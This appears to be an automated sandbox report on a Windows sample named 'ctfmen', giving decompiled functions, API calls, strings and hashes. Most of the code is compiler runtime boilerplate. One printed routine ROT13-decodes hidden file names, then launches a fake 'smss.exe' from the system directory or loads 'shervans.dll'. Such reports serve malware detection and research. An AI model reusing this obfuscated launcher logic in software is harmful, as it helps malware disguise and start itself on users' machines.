API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
String ID:
API String ID: 3695137517-0
Opcode ID: 4a6b14afbb9335201329f32d80b7a7aa2d8db0052c7bcc995225129068e83828
Instruction ID: b4e4ad1f54ebbf9cbd81b67d73a179059569c9c22aa264126cd00cea7d8576b1
Opcode Fuzzy Hash: 4a6b14afbb9335201329f32d80b7a7aa2d8db0052c7bcc995225129068e83828
Instruction Fuzzy Hash: 3D31CCB4A157009FC700EF79D68561A77E0BB88344F41897EF695BB3A1D73898808F5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401149 Relevance: 12.1, APIs: 8, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00401149() {
				char _v12;
				char _v16;
				char* _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _t23;
				intOrPtr* _t25;
				_Unknown_base(*)()* _t34;
				void* _t36;
				void* _t37;
				intOrPtr _t39;
				void* _t42;
				signed int _t44;

				_v44 = E00401000; // executed
				SetUnhandledExceptionFilter(_t34); // executed
				_t44 = _t42 - 0x20;
				E004016C0(E004015C0(_t36, _t37));
				_v12 = 0;
				_v32 =  &_v12;
				 *_t44 = 0x404004;
				_v36 =  *0x402000;
				_v40 =  &_v16;
				_v44 = 0x404000;
				L00401A38();
				_t23 =  *0x404008;
				if(_t23 == 0) {
					L7:
					L00401A28();
					 *_t23 =  *0x402004;
					E00401590(_t23);
					_t44 = _t44 & 0xfffffff0;
					_t25 = E00401570();
					L00401A18();
					_v40 =  *_t25;
					_v44 =  *0x404000;
					 *_t44 =  *0x404004; // executed
					_t23 = E00401410(_t36); // executed
					L00401A10();
					 *_t44 = _t23; // executed
					ExitProcess(??); // executed
					goto L8;
				} else {
					 *0x402004 = _t23;
					_t39 =  *0x405110;
					if(_t39 != 0) {
						L8:
						_v40 = _t23;
						_t23 =  *((intOrPtr*)( *0x405110 + 0x10));
						_v44 = _t23;
						L00401A30();
						_t39 =  *0x405110;
					}
					if(_t39 != 0xffffffe0) {
						_v40 =  *0x404008;
						_t23 =  *((intOrPtr*)( *0x405110 + 0x30));
						_v44 = _t23;
						L00401A30();
						_t39 =  *0x405110;
					}
					if(_t39 != 0xffffffc0) {
						_v40 =  *0x404008;
						_t23 =  *((intOrPtr*)( *0x405110 + 0x50));
						_v44 = _t23;
						L00401A30();
					}
					goto L7;
				}
			}

0x00401157
0x0040115e
0x00401163
0x0040116b
0x00401170
0x0040117a
0x00401183
0x0040118a
0x00401191
0x0040119a
0x0040119e
0x004011a3
0x004011aa
0x00401210
0x00401210
0x0040121b
0x0040121d
0x00401222
0x00401225
0x0040122a
0x00401231
0x0040123a
0x00401243
0x00401246
0x0040124d
0x00401252
0x00401255
0x00000000
0x004011ac
0x004011ac
0x004011b1
0x004011b9
0x00401260
0x00401260
0x00401269
0x0040126c
0x0040126f
0x00401274
0x00401274
0x004011c2
0x004011c9
0x004011d2
0x004011d5
0x004011d8
0x004011dd
0x004011dd
0x004011e6
0x004011ed
0x004011f6
0x004011f9
0x004011fc
0x004011fc
0x00000000
0x004011e6

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040115E
__getmainargs.MSVCRT ref: 0040119E
_setmode.MSVCRT ref: 004011D8
_setmode.MSVCRT ref: 004011FC
__p__fmode.MSVCRT ref: 00401210
__p__environ.MSVCRT ref: 0040122A
_cexit.MSVCRT ref: 0040124D
ExitProcess.KERNEL32 ref: 00401255
_setmode.MSVCRT ref: 0040126F

Memory Dump Source

Source File: 00000004.00000002.273253407.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.273184644.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273381026.0000000000403000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273389736.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273402573.0000000000407000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ctfmen.jbxd

Similarity

API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
String ID:
API String ID: 3695137517-0
Opcode ID: 709f0de60eb04450f0c9f3fd8be5254e618704319a97381d622a77c23d240c61
Instruction ID: 421bbcab5bcb8a1a5ed88441b19a121feb82d79bf90f0e60bb0b5e7d48326fb6
Opcode Fuzzy Hash: 709f0de60eb04450f0c9f3fd8be5254e618704319a97381d622a77c23d240c61
Instruction Fuzzy Hash: B421CAB4A157009FC700EF79D68561A77E0BB88348F41897EF695B73A1D73898808F5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401410 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 63
sleepprocesslibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401410(void* __ecx) {
				void* _v16;
				char _v224;
				char _v256;
				struct _PROCESS_INFORMATION _v272;
				short _v304;
				intOrPtr _v308;
				int _v352;
				int _t16;
				struct _STARTUPINFOA* _t23;
				CHAR* _t26;

				_t25 =  &_v256;
				_t26 =  &_v224;
				_t23 =  &_v352;
				E00401570();
				E004013A2( &_v256, "fzaff.rkr");
				E004013CC(_t26, 0xc8,  &_v256);
				memset(_t23, 0, 0x44);
				_v352 = 0x44;
				_v308 = 1;
				_v304 = 5;
				_t16 = CreateProcessA(0, _t26, 0, 0, 0, 0, 0, 0, _t23,  &_v272); // executed
				if(_t16 != 0) {
					CloseHandle(_v272.hThread);
					CloseHandle(_v272);
				} else {
					E004013A2(_t25, "fureinaf.qyy");
					E004013CC(_t26, 0xc8, _t25);
					LoadLibraryA(_t26);
					Sleep(0xbb8);
				}
				return 0;
			}

0x00401414
0x0040141b
0x00401428
0x0040142e
0x00401439
0x00401445
0x0040144f
0x00401454
0x00401478
0x00401482
0x0040148b
0x00401492
0x004014c6
0x004014d1
0x00401494
0x0040149a
0x004014a6
0x004014ac
0x004014b6
0x004014bb
0x004014df

APIs

Part of subcall function 004013CC: GetSystemDirectoryA.KERNEL32(?,?), ref: 004013E2
Part of subcall function 004013CC: lstrlen.KERNEL32(?,?,?,?,0040144A,?,000000C8,?,?,fzaff.rkr), ref: 004013E8
Part of subcall function 004013CC: lstrcat.KERNEL32(?,00403036), ref: 004013FA
Part of subcall function 004013CC: lstrcat.KERNEL32(?,000000C8), ref: 00401403

memset.MSVCRT ref: 0040144F
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040148B
LoadLibraryA.KERNEL32(?,?,000000C8,?,?,fureinaf.qyy,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004014AC
Sleep.KERNEL32(00000BB8,?,?,000000C8,?,?,fureinaf.qyy,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004014B6
CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004014C6
CloseHandle.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004014D1

Strings

D, xrefs: 00401454
fureinaf.qyy, xrefs: 00401494
fzaff.rkr, xrefs: 00401433

Memory Dump Source

Source File: 00000004.00000002.273253407.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.273184644.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273381026.0000000000403000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273389736.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273402573.0000000000407000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ctfmen.jbxd

Similarity

API ID: CloseHandlelstrcat$CreateDirectoryLibraryLoadProcessSleepSystemlstrlenmemset
String ID: D$fureinaf.qyy$fzaff.rkr
API String ID: 2342358475-843627415
Opcode ID: 4726f803edde29433d8ee108cabd3ca17cc547d924d72f493488a07b61c88d33
Instruction ID: 94c7f4a56ebdde8ab0fd0faed4419e19204ddf4c58d1c27792508de29747b16a
Opcode Fuzzy Hash: 4726f803edde29433d8ee108cabd3ca17cc547d924d72f493488a07b61c88d33
Instruction Fuzzy Hash: 7711C271A41218B9E72077628C42FDF767C9F51749F4041BAFA08350E2D7BC1A444EAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401280 Relevance: 3.0, APIs: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E00401280() {
				void* _t4;
				intOrPtr* _t5;
				intOrPtr* _t8;

				 *_t8 = 1;
				 *0x405108();
				E00401150();
				_t5 = _t8;
				 *((intOrPtr*)(_t8 - 8)) = 2;
				 *0x405108(_t4); // executed
				E00401150(); // executed
				_push(_t5);
				goto __ecx;
			}

0x00401286
0x0040128d
0x00401293
0x004012a1
0x004012a6
0x004012ad
0x004012b3
0x004012c0
0x004012ca

APIs

__set_app_type.MSVCRT ref: 0040128D

Part of subcall function 00401150: SetUnhandledExceptionFilter.KERNEL32 ref: 0040115E
Part of subcall function 00401150: __getmainargs.MSVCRT ref: 0040119E
Part of subcall function 00401150: _setmode.MSVCRT ref: 004011D8
Part of subcall function 00401150: _setmode.MSVCRT ref: 004011FC
Part of subcall function 00401150: __p__fmode.MSVCRT ref: 00401210
Part of subcall function 00401150: __p__environ.MSVCRT ref: 0040122A
Part of subcall function 00401150: _cexit.MSVCRT ref: 0040124D
Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401255

__set_app_type.MSVCRT ref: 004012AD

Memory Dump Source

Source File: 00000004.00000002.273253407.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.273184644.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273381026.0000000000403000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273389736.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273402573.0000000000407000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ctfmen.jbxd

Similarity

API ID: __set_app_type_setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
String ID:
API String ID: 570162737-0
Opcode ID: e8091d8bd3bffb70673248e43d8af242892c9b374757f3d7f013d3735d48378c
Instruction ID: 5c8ab284ea271eea037cec49ac7268bd5119de4b4cd77f8206c36f2d19225082
Opcode Fuzzy Hash: e8091d8bd3bffb70673248e43d8af242892c9b374757f3d7f013d3735d48378c
Instruction Fuzzy Hash: 5AD09B35404614ABC3003BF5DD0A359BBA8AB05301F41143CE6C577261D7B438454BD6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004012E0 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E004012E0(void* __eax) {
				void* _v20;
				short _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v112;
				short _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v192;
				int _v196;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				void* __ebx;
				char _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				signed int _t68;
				intOrPtr _t71;
				void* _t72;
				signed char _t90;
				char _t93;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t105;
				void* _t107;
				signed int _t108;
				signed int _t114;
				void* _t118;
				signed int _t119;
				signed int _t124;
				signed int _t127;
				struct _IO_FILE* _t131;
				struct _IO_FILE* _t133;
				signed int* _t134;
				intOrPtr* _t135;
				intOrPtr* _t137;
				intOrPtr* _t138;
				signed int* _t139;

				_pop(_t130);
				_t131 = _t133;
				_push(_t107);
				_t134 = _t133 - 0xcc;
				if( *0x404058 == 0) {
					_v112 = 0x41414141;
					_t58 = "-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32"; // 0x42494c2d
					_t127 =  &_v112;
					_v108 = 0x41414141;
					_v104 = 0x41414141;
					_v80 = _t58;
					_t59 = M00403054; // 0x57434347
					_v100 = 0x41414141;
					_v96 = 0x41414141;
					_v76 = _t59;
					_t60 = M00403058; // 0x452d3233
					_v92 = 0x41414141;
					_v88 = 0x41414141;
					_v72 = _t60;
					_t61 = M0040305C; // 0x2d322d48
					_v84 = 0x41414141;
					_v68 = _t61;
					_t62 = M00403060; // 0x4a4c4a53
					_v64 = _t62;
					_t63 = M00403064; // 0x4854472d
					_v60 = _t63;
					_t64 = M00403068; // 0x494d2d52
					_v56 = _t64;
					_t65 =  *0x40306c; // 0x3357474e
					_v52 = _t65;
					_v48 =  *0x403070 & 0x0000ffff;
					 *_t134 = _t127;
					_t68 = FindAtomA(??) & 0x0000ffff;
					_t135 = _t134 - 4;
					_v196 = _t68;
					if(_t68 != 0) {
						L11:
						_t108 = E004016E0(_t68, _t107);
					} else {
						 *_t135 = 0x3c;
						_t72 = malloc(??);
						_t108 = _t72;
						if(_t72 == 0) {
							abort();
							0;
							0;
							_t137 = _t135 - 0x18;
							_v232 = _v204;
							_v236 = _v208;
							_v240 = _v212;
							_v244 = _v216;
							 *_t137 =  *0x405110 + 0x40;
							fprintf(??, ??);
							 *_t137 =  *0x405110 + 0x40;
							fflush(_t131);
							abort();
							0;
							goto ( *0x40510c);
						}
						asm("cld");
						memset(_t72, _v196, 0xf << 2);
						_t138 = _t135 + 0xc;
						 *((intOrPtr*)(_t108 + 4)) = L00401A60;
						_t114 = 1;
						 *((intOrPtr*)(_t108 + 8)) = E004016D0;
						 *_t108 = 0x3c;
						 *((intOrPtr*)(_t108 + 0x28)) = 0;
						 *((intOrPtr*)(_t108 + 0x14)) =  *0x404028;
						 *((intOrPtr*)(_t108 + 0x18)) =  *0x40402c;
						 *((intOrPtr*)(_t108 + 0x1c)) =  *0x40200c;
						 *((intOrPtr*)(_t108 + 0x20)) =  *0x402010;
						 *((intOrPtr*)(_t108 + 0x30)) = 0xffffffff;
						 *((intOrPtr*)(_t108 + 0x2c)) =  *0x404038;
						 *((intOrPtr*)(_t108 + 0x38)) =  *0x402018;
						_t118 = 0x1f;
						 *((intOrPtr*)(_t108 + 0x34)) =  *0x402014;
						do {
							_t90 = _t108 & _t114;
							asm("sbb eax, eax");
							_t114 = _t114 + _t114;
							 *((char*)(_t118 +  &_v192)) = (_t90 & 0x00000020) + 0x41;
							_t118 = _t118 - 1;
						} while (_t118 >= 0);
						_t93 = "-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32"; // 0x42494c2d
						_v160 = _t93;
						_t94 = M00403054; // 0x57434347
						_v156 = _t94;
						_t95 = M00403058; // 0x452d3233
						_v152 = _t95;
						_t96 = M0040305C; // 0x2d322d48
						_v148 = _t96;
						_t97 = M00403060; // 0x4a4c4a53
						_v144 = _t97;
						_t98 = M00403064; // 0x4854472d
						_v140 = _t98;
						_t99 = M00403068; // 0x494d2d52
						_v136 = _t99;
						_t100 =  *0x40306c; // 0x3357474e
						_v132 = _t100;
						_v128 =  *0x403070 & 0x0000ffff;
						 *_t138 =  &_v192;
						_t124 = AddAtomA(??) & 0x0000ffff;
						_t139 = _t138 - 4;
						if(_t124 != 0) {
							_t105 = E004016E0(_t124, _t108);
							_t119 = _t124;
							if(_t105 != _t108) {
								goto L8;
							} else {
								goto L9;
							}
							goto L18;
						} else {
							L8:
							_t119 = 0;
						}
						L9:
						if(_t119 == 0) {
							 *_t139 = _t108;
							L00401A50();
							 *_t139 = _t127;
							_t68 = FindAtomA(??) & 0x0000ffff;
							goto L11;
						}
					}
					 *0x404058 = _t108;
					_t46 = _t108 + 4; // 0x4
					 *0x404048 = _t46;
					_t47 = _t108 + 8; // 0x8
					_t71 = _t47;
					 *0x404068 = _t71;
					return _t71;
				} else {
					return __eax;
				}
				L18:
			}

0x004012e3
0x00401781
0x00401785
0x00401786
0x00401794
0x0040179e
0x004017a5
0x004017aa
0x004017ad
0x004017b4
0x004017bb
0x004017be
0x004017c3
0x004017ca
0x004017d1
0x004017d4
0x004017d9
0x004017e0
0x004017e7
0x004017ea
0x004017ef
0x004017f6
0x004017f9
0x004017fe
0x00401801
0x00401806
0x00401809
0x0040180e
0x00401811
0x00401816
0x00401820
0x00401824
0x0040182d
0x00401830
0x00401835
0x0040183b
0x0040197c
0x00401981
0x00401841
0x00401841
0x00401848
0x0040184f
0x00401851
0x004019b0
0x004019bb
0x004019bf
0x004019c3
0x004019c9
0x004019d0
0x004019d7
0x004019de
0x004019ea
0x004019ed
0x004019fa
0x004019fd
0x00401a02
0x00401a0d
0x00401a10
0x00401a10
0x00401857
0x00401865
0x00401865
0x00401867
0x0040186e
0x00401873
0x0040187f
0x0040188b
0x00401892
0x0040189a
0x004018a3
0x004018ab
0x004018ae
0x004018b5
0x004018c3
0x004018c6
0x004018cb
0x004018d0
0x004018d2
0x004018d7
0x004018db
0x004018df
0x004018e6
0x004018e6
0x004018e9
0x004018ee
0x004018f4
0x004018f9
0x004018ff
0x00401904
0x0040190a
0x0040190f
0x00401915
0x0040191a
0x00401920
0x00401925
0x0040192b
0x00401930
0x00401933
0x00401938
0x00401942
0x0040194c
0x00401955
0x00401958
0x0040195d
0x004019a3
0x004019aa
0x004019ac
0x00000000
0x004019ae
0x00000000
0x004019ae
0x00000000
0x0040195f
0x0040195f
0x0040195f
0x0040195f
0x00401961
0x00401963
0x00401965
0x00401968
0x0040196d
0x00401979
0x00000000
0x00401979
0x00401963
0x00401983
0x00401989
0x0040198c
0x00401991
0x00401991
0x00401994
0x004019a0
0x00401796
0x0040179d
0x0040179d
0x00000000

APIs

FindAtomA.KERNEL32 ref: 00401827
malloc.MSVCRT ref: 00401848
AddAtomA.KERNEL32 ref: 0040194F

Strings

AAAA, xrefs: 004017EF
AAAA, xrefs: 004017AD
AAAA, xrefs: 004017E0
AAAA, xrefs: 004017D9
AAAA, xrefs: 0040179E
AAAA, xrefs: 004017CA
AAAA, xrefs: 004017B4
AAAA, xrefs: 004017C3
-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32, xrefs: 004017A5, 004018E9

Memory Dump Source

Source File: 00000004.00000002.273253407.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.273184644.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273381026.0000000000403000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273389736.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273402573.0000000000407000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ctfmen.jbxd

Similarity

API ID: Atom$Findmalloc
String ID: -LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA
API String ID: 822928543-4229226183
Opcode ID: 9bb77c504e8466537b62264a3fde08d89e2489709f92c9f29974dc0d1c8e0025
Instruction ID: 2b020eeaefe081e10e1e4b8acb93412c82cc4b82683bdaf15cb7f55dcf55b0e0
Opcode Fuzzy Hash: 9bb77c504e8466537b62264a3fde08d89e2489709f92c9f29974dc0d1c8e0025
Instruction Fuzzy Hash: 9A6113B4A013048FDB50DF69DA84699BBF4FB48311F14817AE948FB369E3349A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 9.1, APIs: 6, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00401000(intOrPtr __ebx, intOrPtr __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v24;
				intOrPtr* _t16;
				intOrPtr* _t27;
				intOrPtr* _t33;
				intOrPtr* _t37;

				_v12 = __ebx;
				_t27 = 0;
				_v8 = __esi;
				_t33 = 0;
				_t16 =  *((intOrPtr*)( *_a4));
				if(_t16 > 0xc0000091) {
					__eflags = _t16 - 0xc0000094;
					if(__eflags == 0) {
						goto L3;
					} else {
						if(__eflags > 0) {
							__eflags = _t16 - 0xc0000096;
							goto L14;
						} else {
							__eflags = _t16 - 0xc0000093;
							if(_t16 == 0xc0000093) {
								goto L2;
							} else {
								return 0;
							}
						}
					}
				} else {
					if(_t16 < 0xc000008d) {
						__eflags = _t16 - 0xc0000005;
						if(_t16 == 0xc0000005) {
							 *_t37 = 0xb;
							_v24 = 0;
							L00401A20();
							__eflags = 0 - 1;
							if(0 == 1) {
								 *_t37 = 0xb;
								_v24 = 1;
								L00401A20();
								goto L6;
							} else {
								__eflags = 0;
								if(0 != 0) {
									 *_t37 = 0xb;
									 *0x00000000();
									goto L6;
								}
							}
						} else {
							__eflags = _t16 - 0xc000001d;
							L14:
							if(__eflags == 0) {
								 *_t37 = 4;
								_v24 = 0;
								L00401A20();
								__eflags = _t16 - 1;
								if(_t16 == 1) {
									 *_t37 = 4;
									_v24 = 1;
									L00401A20();
									goto L6;
								} else {
									__eflags = _t16;
									if(_t16 != 0) {
										 *_t37 = 4;
										 *_t16();
										goto L6;
									}
								}
							}
						}
					} else {
						L2:
						_t33 = 1;
						L3:
						 *_t37 = 8;
						_v24 = 0;
						L00401A20();
						if(_t16 == 1) {
							 *_t37 = 8;
							_v24 = 1;
							L00401A20();
							__eflags = _t33;
							if(_t33 != 0) {
								E004016C0(1);
							}
							goto L6;
						} else {
							if(_t16 != 0) {
								 *_t37 = 8;
								 *_t16();
								L6:
								_t27 = 0xffffffff;
							}
						}
					}
					return _t27;
				}
			}

APIs

signal.MSVCRT ref: 00401037
signal.MSVCRT ref: 0040109B
signal.MSVCRT ref: 004010CB

Memory Dump Source

Source File: 00000004.00000002.273253407.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.273184644.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273381026.0000000000403000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273389736.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273402573.0000000000407000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ctfmen.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 6491c55a715dcf65c1e257190edccd3021d22718810e5eb61bd8e24d4d4f1f9f
Instruction ID: 47ce695c1395704ccb81a73c81f467802b35334def71841aa4f43a7f14f2efec
Opcode Fuzzy Hash: 6491c55a715dcf65c1e257190edccd3021d22718810e5eb61bd8e24d4d4f1f9f
Instruction Fuzzy Hash: FF3141B0A052448BD720AF69C58032EB6E0BB09354F15897FE9C5E77E1C67E8CC09B4A

Uniqueness

Uniqueness Score: -1.00%

Function 004016E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetAtomNameA.KERNEL32 ref: 004016FF

Part of subcall function 004019C0: fprintf.MSVCRT ref: 004019ED
Part of subcall function 004019C0: fflush.MSVCRT ref: 004019FD
Part of subcall function 004019C0: abort.MSVCRT(?,?,?,?,?,0040175E), ref: 00401A02

Strings

GetAtomNameA (atom, s, sizeof(s)) != 0, xrefs: 0040175E
w32_sharedptr->size == sizeof(W32_EH_SHARED), xrefs: 00401737
../../gcc/gcc/config/i386/w32-shared-ptr.c, xrefs: 00401750
%s:%u: failed assertion `%s', xrefs: 00401749

Memory Dump Source

Source File: 00000004.00000002.273253407.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.273184644.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273381026.0000000000403000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273389736.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273402573.0000000000407000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ctfmen.jbxd

Similarity

API ID: AtomNameabortfflushfprintf
String ID: %s:%u: failed assertion `%s'$../../gcc/gcc/config/i386/w32-shared-ptr.c$GetAtomNameA (atom, s, sizeof(s)) != 0$w32_sharedptr->size == sizeof(W32_EH_SHARED)
API String ID: 2513348418-2696369246
Opcode ID: 1ee133213eec0f415dbf658d5e2a3167dc8e3140809c25750031008dad7e8e00
Instruction ID: 5a798c4c6fa75a3496ce2cab74e3f0a8b1e10c659dbc764924acd0a29a411e56
Opcode Fuzzy Hash: 1ee133213eec0f415dbf658d5e2a3167dc8e3140809c25750031008dad7e8e00
Instruction Fuzzy Hash: 5E0152B0A043419BDB149F69C08422ABFE4EB94345F10C83FE589AB7A5D27DC941DB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00401324 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00401324(void* __eflags, char _a4) {
				void* _v16;
				char _v48;
				char _v80;
				void* _t19;
				void* _t20;
				char _t28;
				char _t33;
				void* _t38;
				void* _t39;

				_t38 =  &_v80;
				_t39 =  &_v48;
				_t28 = _a4;
				memcpy(_t39, "ABCDEFGHIJKLMNOPQRSTUVWXYZ", 0x1b);
				memcpy(_t38, "abcdefghijklmnopqrstuvwxyz", 0x1b);
				_t19 = E004012F0(_t39, _t28);
				if(_t19 == 0) {
					_t20 = E004012F0(_t38, _t28);
					_t33 = _t28;
					if(_t20 != 0) {
						asm("cdq");
						_t33 =  *((char*)((_t20 - _t38 + 0xd) % 0x1a +  &_v80));
					}
				} else {
					asm("cdq");
					_t33 =  *((char*)((_t19 - _t39 + 0xd) % 0x1a +  &_v48));
				}
				return _t33;
			}

0x00401328
0x0040132c
0x0040133b
0x0040133f
0x0040134c
0x00401353
0x0040135d
0x00401377
0x0040137f
0x00401382
0x00401390
0x00401393
0x00401393
0x0040135f
0x0040136b
0x0040136e
0x0040136e
0x004013a1

APIs

memcpy.MSVCRT ref: 0040133F
memcpy.MSVCRT ref: 0040134C

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00401335
abcdefghijklmnopqrstuvwxyz, xrefs: 00401346

Memory Dump Source

Source File: 00000004.00000002.273253407.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.273184644.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273381026.0000000000403000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273389736.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273402573.0000000000407000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ctfmen.jbxd

Similarity

API ID: memcpy
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ$abcdefghijklmnopqrstuvwxyz
API String ID: 3510742995-4170113403
Opcode ID: 6c292da48972d264751d7bbdcac31dfea94ddd27b6f6ee797df720d1e9c7b4fe
Instruction ID: 7d17000c2f09d8a429465d5ab099176f688db3b50f2b54f17446f46e168fb709
Opcode Fuzzy Hash: 6c292da48972d264751d7bbdcac31dfea94ddd27b6f6ee797df720d1e9c7b4fe
Instruction Fuzzy Hash: 88012B72F0621922E71455BE5C42BBF7A6E8BCA305F14807BF810B19C6C67CDE0212A9

Uniqueness

Uniqueness Score: -1.00%

Function 004013CC Relevance: 6.0, APIs: 4, Instructions: 28
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E004013CC(CHAR* _a4, signed int _a8, intOrPtr _a12) {
				void* _v12;
				int _t11;
				CHAR* _t13;

				asm("cld");
				_t13 = _a4;
				memset(_t13, 0, _a8 << 0);
				_t11 = GetSystemDirectoryA(_t13, _a8);
				_push(_t13);
				L00401A90();
				if(_t13[_t11 - 1] != 0x5c) {
					_push(0x403036);
					_push(_t13);
					L00401A98();
				}
				_push(_a12);
				_push(_t13);
				L00401A98();
				return _t11;
			}

0x004013cd
0x004013d5
0x004013dc
0x004013e2
0x004013e7
0x004013e8
0x004013f2
0x004013f4
0x004013f9
0x004013fa
0x004013fa
0x004013ff
0x00401402
0x00401403
0x0040140e

APIs

